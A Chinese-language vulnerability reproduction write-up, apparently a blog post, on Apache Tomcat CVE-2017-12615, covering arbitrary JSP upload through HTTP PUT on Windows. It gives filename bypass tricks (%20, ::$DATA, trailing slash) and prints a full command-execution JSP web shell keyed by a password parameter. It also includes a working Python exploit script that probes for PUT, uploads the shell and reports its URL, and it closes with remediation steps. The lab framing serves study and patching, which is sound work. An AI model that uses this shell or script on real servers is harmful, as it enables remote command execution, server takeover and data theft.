漏洞描述
当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限,执行命令。
属于配置问题
漏洞原理
当在Tomcat的conf(配置目录下)/web.xml配置文件中添加readonly设置为false时,将导致该漏洞产生,(需要允许put请求)
影响范围
Apache Tomcat 7.0.0 - 7.0.79 Apache Tomcat/8.5.19
漏洞复现
使用vulhub搭建环境,代号/tomcat/CVE-2017-12615
访问
直接使用burp suite抓包
发送到repeater,修改请求方式为put,将写好的jsp木马放到请求体中
我这里的jsp木马是使用哥斯拉生成的
支持三种上传绕过方式 默认使用put 加文件名是失败的 需要绕过
PUT /shell.jsp%20
PUT /shell.jsp::$DATA
PUT /shell.jsp/
访问木马
浏览器访问
哥斯拉连接
还可以将木马替换为相应poc来执行命令
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
浏览器访问上传文件后边加上?&pwd=023&cmd=whoami或其他命令
或者使用代码利用(膜拜大佬)
#! -*- coding:utf-8 -*-
import httplib
import sys
import time
body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''
try:
conn = httplib.HTTPConnection(sys.argv[1])
conn.request(method='OPTIONS', url='/ffffzz')
headers = dict(conn.getresponse().getheaders())
if 'allow' in headers and \
headers['allow'].find('PUT') > 0 :
conn.close()
conn = httplib.HTTPConnection(sys.argv[1])
url = "/" + str(int(time.time()))+'.jsp/'
#url = "/" + str(int(time.time()))+'.jsp::$DATA'
conn.request( method='PUT', url= url, body=body)
res = conn.getresponse()
if res.status == 201 :
#print 'shell:', 'http://' + sys.argv[1] + url[:-7]
print 'shell:', 'http://' + sys.argv[1] + url[:-1]
elif res.status == 204 :
print 'file exists'
else:
print 'error'
conn.close()
else:
print 'Server not vulnerable'
except Exception,e:
print 'Error:', e
这里再贴一下另一个可以命令执行的漏洞,有兴趣可以看一下
Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现
来自 <Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现_apache tomcat/7.0.90漏洞-CSDN博客>
漏洞修复
1、配置readonly值为True或注释参数,禁止使用PUT方法并重启tomcat。 注意:如果禁用PUT方法,对于依赖PUT方法的应用,可能导致业务失效。
2.当然也可以在前端(例如WAF)上阻止PUT和DELETE请求。
3.升级tomcat版本